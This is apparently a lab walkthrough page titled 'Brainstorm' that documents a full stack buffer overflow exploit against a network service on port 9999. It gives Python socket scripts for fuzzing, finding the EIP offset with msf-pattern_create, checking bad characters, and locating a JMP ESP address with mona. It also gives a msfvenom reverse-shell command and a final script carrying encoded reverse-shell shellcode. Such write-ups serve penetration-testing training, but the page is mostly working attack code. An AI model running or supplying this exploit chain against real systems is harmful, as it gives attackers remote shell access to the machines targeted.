Brainstorm
Fuzzing: Check if we can overlow the buffer
import socket
import sys
username = "pika"
message = "A" * 4000
try:
print("sending payload...")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.0.101',9999))
# s.recv(1024)
# s.recv(1024)
s.send(username + b'\r\n')
s.recv(1024)
s.send(message + b'\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect")
sys.exit()
Use msf-pattern_create to overflow the buffer again. Replace the value of "A" with this.
msf-pattern_create -l 5000
Check the value in EIP register. Then use msf-patten_offset to check the position of overflow
msf-pattern_offset -l 5000 -q 35724134
Now use this offset value and try to overwrite the EIP with "B"
import socket
import sys
username = "pika"
message = "A" * 2012 + "B" * 4
try:
print("sending payload...")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.0.105',9999))
#s.recv(1024)
#s.recv(1024)
s.send(username + b'\r\n')
s.recv(1024)
s.send(message + b'\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect")
sys.exit()
Check if the EIP is overwritten with 42424242. Now find badchars. \x00 is bad by default
import socket
import sys
username = "pika"
message = "A" * 2012 + "B" * 4
badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
try:
print("sending payload...")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.0.105',9999))
#s.recv(1024)
#s.recv(1024)
s.send(username + b'\r\n')
s.recv(1024)
s.send(message + badchars + b'\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect")
sys.exit()
Right Click on ESP and click Follow In Dump. Check the badchars there. Next step is to rerun Immunity and start the service. Go to the bottom and type
!mona modules
This will give you a list of information. Check the module which has FALSE across the board. Then do another search.
!mona find -s "\xff\xe4" -m essfunc.dll
Check the Results section and note down the return address. Run the service and click on blue arrow. Enter the return address there. It will take you to the location of that address. Click F2 to set a breakpoint. Then run the following script. (Return Address= 625014DF)
import socket
import sys
username = "pika"
message = "A" * 2012 + "\xdf\x14\x50\x62"
try:
print("sending payload...")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.0.105',9999))
#s.recv(1024)
#s.recv(1024)
s.send(username + b'\r\n')
s.recv(1024)
s.send(message + b'\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect")
sys.exit()
Check if we have overwritten the EIP with the return address. Also check at the buttom if it says Breakpoint at essfunc.625014DF. Then create a msfvenom payload to get a shell. Remember to add any badchars found in the payload to remove them:
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -b "\x00" -f c
Now run the following script to get a shell
import socket
import sys
username = b"pika"
message = b"A" * 2012 + b"\xdf\x14\x50\x62" + b"\x90" * 32
payload = (b"\xbf\x6f\x90\x2c\xf7\xda\xdd\xd9\x74\x24\xf4\x5d\x33\xc9\xb1"
b"\x52\x31\x7d\x12\x03\x7d\x12\x83\x82\x6c\xce\x02\xa0\x65\x8d"
b"\xed\x58\x76\xf2\x64\xbd\x47\x32\x12\xb6\xf8\x82\x50\x9a\xf4"
b"\x69\x34\x0e\x8e\x1c\x91\x21\x27\xaa\xc7\x0c\xb8\x87\x34\x0f"
b"\x3a\xda\x68\xef\x03\x15\x7d\xee\x44\x48\x8c\xa2\x1d\x06\x23"
b"\x52\x29\x52\xf8\xd9\x61\x72\x78\x3e\x31\x75\xa9\x91\x49\x2c"
b"\x69\x10\x9d\x44\x20\x0a\xc2\x61\xfa\xa1\x30\x1d\xfd\x63\x09"
b"\xde\x52\x4a\xa5\x2d\xaa\x8b\x02\xce\xd9\xe5\x70\x73\xda\x32"
b"\x0a\xaf\x6f\xa0\xac\x24\xd7\x0c\x4c\xe8\x8e\xc7\x42\x45\xc4"
b"\x8f\x46\x58\x09\xa4\x73\xd1\xac\x6a\xf2\xa1\x8a\xae\x5e\x71"
b"\xb2\xf7\x3a\xd4\xcb\xe7\xe4\x89\x69\x6c\x08\xdd\x03\x2f\x45"
b"\x12\x2e\xcf\x95\x3c\x39\xbc\xa7\xe3\x91\x2a\x84\x6c\x3c\xad"
b"\xeb\x46\xf8\x21\x12\x69\xf9\x68\xd1\x3d\xa9\x02\xf0\x3d\x22"
b"\xd2\xfd\xeb\xe5\x82\x51\x44\x46\x72\x12\x34\x2e\x98\x9d\x6b"
b"\x4e\xa3\x77\x04\xe5\x5e\x10\xeb\x52\x60\x85\x83\xa0\x60\x5b"
b"\x35\x2c\x86\x09\xa5\x78\x11\xa6\x5c\x21\xe9\x57\xa0\xff\x94"
b"\x58\x2a\x0c\x69\x16\xdb\x79\x79\xcf\x2b\x34\x23\x46\x33\xe2"
b"\x4b\x04\xa6\x69\x8b\x43\xdb\x25\xdc\x04\x2d\x3c\x88\xb8\x14"
b"\x96\xae\x40\xc0\xd1\x6a\x9f\x31\xdf\x73\x52\x0d\xfb\x63\xaa"
b"\x8e\x47\xd7\x62\xd9\x11\x81\xc4\xb3\xd3\x7b\x9f\x68\xba\xeb"
b"\x66\x43\x7d\x6d\x67\x8e\x0b\x91\xd6\x67\x4a\xae\xd7\xef\x5a"
b"\xd7\x05\x90\xa5\x02\x8e\xa0\xef\x0e\xa7\x28\xb6\xdb\xf5\x34"
b"\x49\x36\x39\x41\xca\xb2\xc2\xb6\xd2\xb7\xc7\xf3\x54\x24\xba"
b"\x6c\x31\x4a\x69\x8c\x10")
try:
print("sending payload...")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.0.105',9999))
#s.recv(1024)
#s.recv(1024)
s.send(username + b'\r\n')
s.recv(1024)
s.send(message + payload + b'\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect")
sys.exit()
Last updated
Was this helpful?